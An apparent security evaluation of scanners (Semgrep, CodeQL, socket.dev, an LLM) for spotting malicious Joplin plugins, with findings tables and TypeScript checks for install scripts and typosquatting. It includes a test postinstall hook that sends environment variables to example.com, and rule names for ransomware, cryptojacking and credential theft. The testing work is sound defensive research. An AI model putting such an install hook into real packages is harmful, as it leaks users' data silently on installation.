| Weak Cryptography (CBC mode) | The code uses an outdated encryption algorithm mode (like AES-CBC) instead of modern authenticated encryption (like AES-GCM). |
| Insecure Network Traffic (HTTP) | The plugin is making network requests (fetching data or sending user info) over plain http:// rather than secure https://. |
| ReDoS (Inefficient Regex) | Regular Expression Denial of Service. The code contains a poorly structured regex pattern that requires exponential time to evaluate certain complex strings. |
All of these were code quality noise.
Additional test for Semgrep :
I ran Semgrep on the same test file:
| Rule ID / Finding | Description / Threat |
|---|---|
| `eval-detected` | Detected the use of `eval()`. Potential code injection vulnerability. |
| `joplin-plugin-dynamic-code-execution` | Remote or dynamically-loaded data flows into dynamic code execution (RCE). |
| `joplin-plugin-master-password-access` | MANUAL REVIEW REQUIRED: Plugin reads the master encryption password. |
| `joplin-plugin-sync-cache-access` | MANUAL REVIEW REQUIRED: Plugin reads the sync info cache (encryption keys/sync metadata). |
| `joplin-plugin-secret-key-theft` | Sensitive Joplin credentials flowing to a network/file/process/IPC sink. |
| `joplin-plugin-unauthorized-fs-write` | A path derived from `__dirname` flows to a file write (Self-modification). |
| `joplin-plugin-network-backdoor` | A server created via `createServer()` flows to `.listen()` (Network port opened). |
| `joplin-plugin-clipboard-hijacking` | Data flows into `clipboard.writeText()` (Clipboard hijacking). |
| `joplin-plugin-command-execution` | Data flows into shell command execution. Requires review. |
| `joplin-plugin-cryptojacking` | A string matching known miners/mining pools flows into `child_process` (Cryptojacking). |
| `joplin-plugin-command-execution` | Data flows into shell command execution. Requires review. |
| `joplin-plugin-data-exfiltration` | Joplin note data read via `joplin.data.get()` flows to a network request. |
| `javascript.crypto.weak-symmetric-mode` | Detected the use of a weak cryptographic mode (aes-256-cbc). |
| `javascript.crypto.symmetric-hardcoded-key` | A secret is hard-coded in the application. |
| `joplin-plugin-ransomware` | Ransomware pattern: reads notes, encrypts them, and writes them back. |
| `joplin-plugin-ransomware-taint` | Encrypted data flows into `joplin.data.put()`. |
| `joplin-plugin-backup-hijacking` | Network or file write detected inside a `registerExportModule()` callback. |
| `joplin-plugin-remote-webview` | An external URL flows into a Joplin webview via `setHtml()`. |
Semgrep caught everything.
How? : The rules written for it were neither dynamic nor flow-tracking. Most of them were direct matches, along the lines of "if you see eval, report it", because Semgrep is an AST-matching scanner. Since the file was written specifically for testing, it caught everything useful. But using the same ruleset on a normal plugin will cause a huge amount of noise. For example, running the Semgrep rules on Jarvis:
| File | Lines | What the code is actually doing |
|---|---|---|
| `src/chatPanel.ts` | 94 | Building the HTML for the main Jarvis chat input UI (`<div class="jarvis-chat-panel">`). |
| `src/commands/ask.ts` | 30, 97, 127 | Building HTML forms for the "Ask Jarvis" and "Edit with Jarvis" popup dialogs. |
| `src/commands/research.ts` | 52 | Building the HTML form for the "Research with Jarvis" dialog. |
| `src/models/models.ts` | 1317 | Injecting local CSS styles (`<style>`) for a preview window. |
| `src/ux/modelManagement.ts` | 435 | Calling a helper function `build_dialog_html` to render the model management UI. |
| `src/ux/panel.ts` | 27, 51, 91 | Building the HTML for the sidebar panels (showing related notes, search boxes, and progress bars). |
They all are useless noises.
Similarly calling the codeql new rules on jarvis gave no noise.
Conclusion :
Since the threat model is now mostly about data flow, AST-based scanners such as Semgrep and SonarQube (primarily a code quality scanner) are not able to cover it. Even if more complex custom rules are written, the main trade-off is that the tools would be doing something they were not designed for. A large blind spot will always remain for scenarios that were not considered while writing the rules, and the rules will also produce a lot of noise on normal plugins.
The tool that stood a chance was CodeQL. After several tests I came to the same conclusion as for the tools above: even though it can do taint tracking, there will always be blind spots for scenarios that were not considered while writing the rules.
The LLM performed well in all of these cases. Not only was it accurate at scanning, it also occasionally warned me about new issues in the plugins that are potential concerns too.
I still believe an LLM would be a great fit for this pipeline.
SCA TOOL (socket.dev) :
Snyk, Semgrep SCA, and npm audit are general CVE database scanners. For this pipeline we need something that can actually check whether a package is malicious.
The popular tool for this use case is socket.dev.
The first thing I did was run a Socket scan on the top 10 plugins from the Joplin plugin website.
Why? To determine the noise level. Also, I had previously tested socket.dev with custom malicious postinstall scripts and similar, but it did not give any results because it only works on packages officially published to npm.
One thing to keep in mind while viewing these results is that socket.dev has 3 tiers: low, warn, and critical. I have filtered out the low findings completely.
Here are the results for the top 10 plugins:
1. joplin-inline-tags-plugin :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| fast-xml-parser | 4.2.5 | criticalCVE | warn |
| form-data | 2.3.3 | criticalCVE | warn |
| form-data | 2.5.1 | criticalCVE | warn |
| form-data | 4.0.0 | criticalCVE | warn |
| entities | 4.5.0 | obfuscatedFile | warn |
| immer | 7.0.15 | criticalCVE | warn |
2. joplin-inline-todo :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| entities | 4.5.0 | obfuscatedFile | warn |
| handlebars | 4.7.8 | criticalCVE | warn |
3. joplin-math-mode :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| - | - | No alerts detected | - |
The scan completed successfully and detected 0 alerts. The alerts object is entirely empty.
4. joplin-plugin-combine-notes :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| form-data | 2.3.3 | criticalCVE | warn |
| form-data | 4.0.0 | criticalCVE | warn |
| form-data | 2.5.1 | criticalCVE | warn |
| entities | 4.5.0 | obfuscatedFile | warn |
| immer | 7.0.15 | criticalCVE | warn |
5. joplin-plugin-diff-tool :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| entities | 4.5.0 | obfuscatedFile | warn |
6. joplin-plugin-extra-editor-settings :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| entities | 4.5.0 | obfuscatedFile | warn |
| form-data | 4.0.1 | criticalCVE | warn |
7. joplin-plugin-jarvis :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| entities | 4.5.0 | obfuscatedFile | warn |
| markdown-it | 14.2.0 | obfuscatedFile | warn |
| markdown-it | 14.2.0 | obfuscatedFile | warn |
8. plugin-templates :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| handlebars | 4.7.8 | criticalCVE | warn |
9. plugin-yesyoukan :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| entities | 4.5.0 | obfuscatedFile | warn |
10. joplin-plugin-quick-links :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| fast-xml-parser | 4.2.5 | criticalCVE | warn |
| form-data | 2.3.3 | criticalCVE | warn |
| form-data | 4.0.0 | criticalCVE | warn |
| form-data | 2.5.1 | criticalCVE | warn |
| entities | 4.5.0 | obfuscatedFile | warn |
| immer | 7.0.15 | criticalCVE | warn |
Observation :
The results were full of false positives. Every alert that was generated was a false positive.
entities: obfuscatedFile appeared in 8/10 plugins. This is a machine-generated lookup table for decoding HTML characters. Socket.dev cannot distinguish between intentionally obfuscated malware and auto-generated data tables.
form-data: criticalCVE appeared in 4/10 plugins (per the tables above). It is a dependency pulled in through @joplin/* packages.
Is there a way to silence it? The only options are to silence, one by one, every package that could be pulled in (not feasible), or to add CVE and obfuscatedFile to the ignore list, but then we would lose the useful information too (not feasible).
markdown-it: obfuscatedFile was flagged only in Jarvis. These are standard minified browser bundles. False positive.
immer, fast-xml-parser, handlebars: criticalCVE. These are known CVEs in older versions of the packages. They are not Joplin-specific and fall in the warn category. This is not what we are looking for, nor does it help us, and a few of them come from @joplin/*.
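The problem with silencing by alert type can be sketched in a few lines of TypeScript. This is only an illustration and not Socket.dev's actual configuration format: `SocketAlert`, `applyIgnoreList`, and the `hypothetical-evil-pkg` entry are assumptions of mine. The first three alerts are copied from the Jarvis table.

```typescript
interface SocketAlert {
  pkg: string;
  version: string;
  type: string;
}

// Alerts from the joplin-plugin-jarvis scan, plus one made-up malicious entry.
const jarvisAlerts: SocketAlert[] = [
  { pkg: "entities", version: "4.5.0", type: "obfuscatedFile" },
  { pkg: "markdown-it", version: "14.2.0", type: "obfuscatedFile" },
  { pkg: "markdown-it", version: "14.2.0", type: "obfuscatedFile" },
  // Hypothetical: a package that really does ship an obfuscated payload.
  { pkg: "hypothetical-evil-pkg", version: "1.0.0", type: "obfuscatedFile" },
];

// Drop every alert whose type is on the ignore list.
function applyIgnoreList(alerts: SocketAlert[], ignoredTypes: string[]): SocketAlert[] {
  return alerts.filter((alert) => ignoredTypes.indexOf(alert.type) === -1);
}

const remainingAlerts = applyIgnoreList(jarvisAlerts, ["criticalCVE", "obfuscatedFile"]);
console.log(remainingAlerts.length);
```

With both types ignored, nothing is left, including the one alert that would have mattered. A type-level ignore list removes the noise and the signal together.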
Summary
| Plugin | Alerts | Real Threats | False Positives |
|---|---|---|---|
| joplin-inline-tags-plugin | 6 | 0 | 6 |
| joplin-inline-todo | 2 | 0 | 2 |
| joplin-math-mode | 0 | 0 | 0 |
| joplin-plugin-combine-notes | 5 | 0 | 5 |
| joplin-plugin-diff-tool | 1 | 0 | 1 |
| joplin-plugin-extra-editor-settings | 2 | 0 | 2 |
| joplin-plugin-jarvis | 3 | 0 | 3 |
| plugin-templates | 1 | 0 | 1 |
| plugin-yesyoukan | 1 | 0 | 1 |
| joplin-plugin-quick-links | 6 | 0 | 6 |
| Total | 27 | 0 | 27 |
Then I ran the test again on Jarvis with a new custom dependency :
"akshajrawat.utils": "^1.0.1",
that contained :
"postinstall": "node -e \"require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)\""
No new alerts were reported.
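For comparison, a check for this specific case is small. The sketch below is a minimal TypeScript version, assuming the dependency's `package.json` has already been loaded into an object. `PackageManifest` and `findInstallScripts` are names I made up. The hook names are the npm lifecycle scripts that run during installation.

```typescript
interface PackageManifest {
  name: string;
  scripts?: Record<string, string>;
}

// npm lifecycle hooks that run automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Return the install-time hooks that a manifest defines.
function findInstallScripts(manifest: PackageManifest): string[] {
  const scripts = manifest.scripts ?? {};
  return INSTALL_HOOKS.filter((hook) => typeof scripts[hook] === "string");
}

// The test dependency from above, with its postinstall script.
const testDependency: PackageManifest = {
  name: "akshajrawat.utils",
  scripts: {
    postinstall: `node -e "require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)"`,
  },
};

// A manifest with only ordinary scripts, for contrast.
const ordinaryDependency: PackageManifest = {
  name: "ordinary-lib",
  scripts: { build: "tsc", test: "jest" },
};

console.log(findInstallScripts(testDependency));
console.log(findInstallScripts(ordinaryDependency));
```

This only reports that a hook exists. Deciding whether the script is harmful is left to the reviewer or to the LLM summary.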
Conclusion :
Every single alert across all 10 plugins is either a CVE in a trusted Joplin dependency or a false positive obfuscation flag on generated/minified files. A maintainer reading these reports would find zero actionable information.
Socket.dev has no @joplin/* filter and surfaces the same Joplin-owned CVEs on every plugin.
As shown in the proposal test, a purpose-built malicious postinstall script was missed completely, and the older tests showed the same result: these custom packages were missed.
What we can do :
Do not integrate Socket.dev. The LLM SCA summary (install scripts + non-registry sources + direct dependency typosquatting check) covers the actual threat surface more accurately and with significantly less noise:
1. Flag: Install Scripts Detected (postinstall, preinstall)
- The Threat: The plugin or a dependency tries to execute terminal commands on the user's machine the moment it is downloaded.
- The Reviewer's Action: Hard Reject. In Joplin, there is almost no reason for a plugin to run shell commands during installation.
2. Flag: Non-Registry Sources (Git URLs)
- The Threat: The `package.json` points to a URL like `github:someuser/somerepo` or an HTTP link instead of an official npm version.
- The Reviewer's Action: Block & Demand Migration. The reviewer can refuse to approve the plugin because it breaks the security scanner's ability to track it.
3. Flag: Direct Dependency Typosquatting
If there is a typosquatted package, the plugin should be rejected immediately.
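Flags 2 and 3 can be pre-computed before the LLM summary. The following TypeScript is a rough sketch under my own assumptions, not the pipeline's implementation: `isNonRegistrySource`, `editDistance`, `findTyposquats`, the prefix list, the `knownPackages` allowlist, and the distance threshold of 2 are all illustrative choices.

```typescript
// Dependency specifiers that bypass the npm registry (git, hosted shorthands, URLs, local files).
const NON_REGISTRY_PREFIXES = [
  "git+", "git:", "git@", "github:", "gitlab:", "bitbucket:", "http:", "https:", "file:",
];

function isNonRegistrySource(spec: string): boolean {
  for (const prefix of NON_REGISTRY_PREFIXES) {
    if (spec.indexOf(prefix) === 0) return true;
  }
  // npm also accepts a bare "user/repo" GitHub shorthand; relative paths match here too.
  return /^[\w.-]+\/[\w.-]+(#.+)?$/.test(spec);
}

// Levenshtein distance, computed one row at a time.
function editDistance(a: string, b: string): number {
  let prev: number[] = [];
  for (let j = 0; j <= b.length; j++) prev.push(j);
  for (let i = 1; i <= a.length; i++) {
    const curr: number[] = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a.charAt(i - 1) === b.charAt(j - 1) ? 0 : 1;
      curr.push(Math.min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + cost));
    }
    prev = curr;
  }
  return prev[b.length];
}

// Flag names that are close to, but not the same as, a known package name.
function findTyposquats(deps: string[], known: string[], maxDistance: number = 2): string[] {
  return deps.filter(
    (dep) =>
      known.indexOf(dep) === -1 &&
      known.some((name) => editDistance(dep, name) <= maxDistance)
  );
}

// Illustrative allowlist built from package names that appear in the scans above.
const knownPackages = ["entities", "form-data", "handlebars", "immer", "markdown-it", "fast-xml-parser"];

// Hypothetical direct dependencies of a plugin under review.
const directDeps: Record<string, string> = {
  "markdown-it": "^14.0.0",
  "handelbars": "^4.7.8",
  "some-lib": "github:someuser/somerepo",
};

const depNames = Object.keys(directDeps);
console.log(depNames.filter((dep) => isNonRegistrySource(directDeps[dep])));
console.log(findTyposquats(depNames, knownPackages));
```

A fixed edit-distance threshold will misfire on very short package names, so the output is best treated as a hint for the reviewer and not as a verdict.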





